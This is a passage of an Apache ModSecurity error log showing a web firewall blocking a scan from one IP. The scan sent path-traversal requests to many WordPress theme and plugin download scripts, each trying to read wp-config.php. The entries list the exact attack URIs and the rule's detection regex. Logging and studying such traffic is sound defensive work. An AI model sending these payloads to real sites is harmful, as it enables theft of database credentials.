"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cuckootap/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cuckootap/download.php"] [unique_id "Ytscb3hurfgLch3PImzIFwAAAMY"] [Fri Jul 22 16:53:51.788077 2022] [:error] [pid 22472:tid 140016948774656] [client 72.11.157.116:51636] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IncredibleWP/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IncredibleWP/download.php"] [unique_id "YtscbypbG8_UBGXeM63w1gAAAJc"] [Fri Jul 22 16:53:51.889977 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:51638] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ultimatum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ultimatum/download.php"] [unique_id "YtscbypbG8_UBGXeM63w1wAAAJU"] [Fri Jul 22 16:53:51.979516 2022] [:error] [pid 22471:tid 140016973952768] [client 72.11.157.116:51640] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Centum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Centum/download.php"] [unique_id "Ytscb-CtYZwatdwcM8Wq2wAAAFQ"] [Fri Jul 22 16:53:52.069121 2022] [:error] [pid 22470:tid 140017024308992] [client 72.11.157.116:51642] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Avada/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Avada/download.php"] [unique_id "YtsccHxqqtgWgIAXsGFhhQAAAA4"] [Fri Jul 22 16:53:52.162572 2022] [:error] [pid 22472:tid 140017007523584] [client 72.11.157.116:51644] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/striking_r/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/striking_r/download.php"] [unique_id "YtsccCpbG8_UBGXeM63w2AAAAJA"] [Fri Jul 22 16:53:52.252171 2022] [:error] [pid 22472:tid 140017024308992] [client 72.11.157.116:51646] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/beach_apollo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/beach_apollo/download.php"] [unique_id "YtsccCpbG8_UBGXeM63w2QAAAI4"] [Fri Jul 22 16:53:52.342630 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:51648] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"] [unique_id "YtsccHhurfgLch3PImzIGAAAAMo"] [Fri Jul 22 16:53:52.440350 2022] [:error] [pid 23081:tid 140017141806848] [client 72.11.157.116:51650] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/newspro2891/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/newspro2891/download.php"] [unique_id "YtsccHhurfgLch3PImzIGQAAAMA"] [Fri Jul 22 16:53:52.536740 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51652] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/draisabeladavid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/draisabeladavid/download.php"] [unique_id "YtsccHhurfgLch3PImzIGgAAAME"] [Fri Jul 22 16:53:52.628632 2022] [:error] [pid 22472:tid 140017125021440] [client 72.11.157.116:51654] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hfr/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hfr/download.php"] [unique_id "YtsccCpbG8_UBGXeM63w2gAAAII"] [Fri Jul 22 16:53:52.720522 2022] [:error] [pid 22470:tid 140017007523584] [client 72.11.157.116:51656] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "YtsccHxqqtgWgIAXsGFhhgAAABA"] [Fri Jul 22 16:53:52.820763 2022] [:error] [pid 22470:tid 140016965560064] [client 72.11.157.116:51658] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "YtsccHxqqtgWgIAXsGFhhwAAABU"] [Fri Jul 22 16:53:52.911566 2022] [:error] [pid 22470:tid 140017125021440] [client 72.11.157.116:51660] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yaml-green/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yaml-green/download.php"] [unique_id "YtsccHxqqtgWgIAXsGFhiAAAAAI"] [Fri Jul 22 16:53:53.017696 2022] [:error] [pid 23081:tid 140017015916288] [client 72.11.157.116:51662] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/itchyrobot_parent/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/itchyrobot_parent/download.php"] [unique_id "YtsccXhurfgLch3PImzIGwAAAM8"] [Fri Jul 22 16:53:53.107531 2022] [:error] [pid 22472:tid 140017049487104] [client 72.11.157.116:51664] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mh-magazine-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mh-magazine-lite/down.php"] [unique_id "YtsccSpbG8_UBGXeM63w2wAAAIs"] [Fri Jul 22 16:53:53.201240 2022] [:error] [pid 23081:tid 140016999130880] [client 72.11.157.116:51666] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/seacad/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/seacad/inc/download.php"] [unique_id "YtsccXhurfgLch3PImzIHAAAANE"] [Fri Jul 22 16:53:53.297121 2022] [:error] [pid 22472:tid 140016940381952] [client 72.11.157.116:51670] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/theme-wpaitaliadigitale-full/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/theme-wpaitaliadigitale-full/down.php"] [unique_id "YtsccSpbG8_UBGXeM63w3AAAAJg"] [Fri Jul 22 16:53:53.386776 2022] [:error] [pid 23081:tid 140017108236032] [client 72.11.157.116:51672] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jamesaltucher/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jamesaltucher/download.php"] [unique_id "YtsccXhurfgLch3PImzIHQAAAMQ"] [Fri Jul 22 16:53:53.480445 2022] [:error] [pid 23081:tid 140017116628736] [client 72.11.157.116:51674] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "YtsccXhurfgLch3PImzIHgAAAMM"] [Fri Jul 22 16:53:53.581730 2022] [:error] [pid 22470:tid 140016948774656] [client 72.11.157.116:51676] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "YtsccXxqqtgWgIAXsGFhigAAABc"] [Fri Jul 22 16:53:53.671364 2022] [:error] [pid 22471:tid 140016957167360] [client 72.11.157.116:51678] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quark/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quark/download.php"] [unique_id "YtscceCtYZwatdwcM8Wq3AAAAFY"] [Fri Jul 22 16:53:53.781919 2022] [:error] [pid 22472:tid 140017083057920] [client 72.11.157.116:51680] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/todays/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy 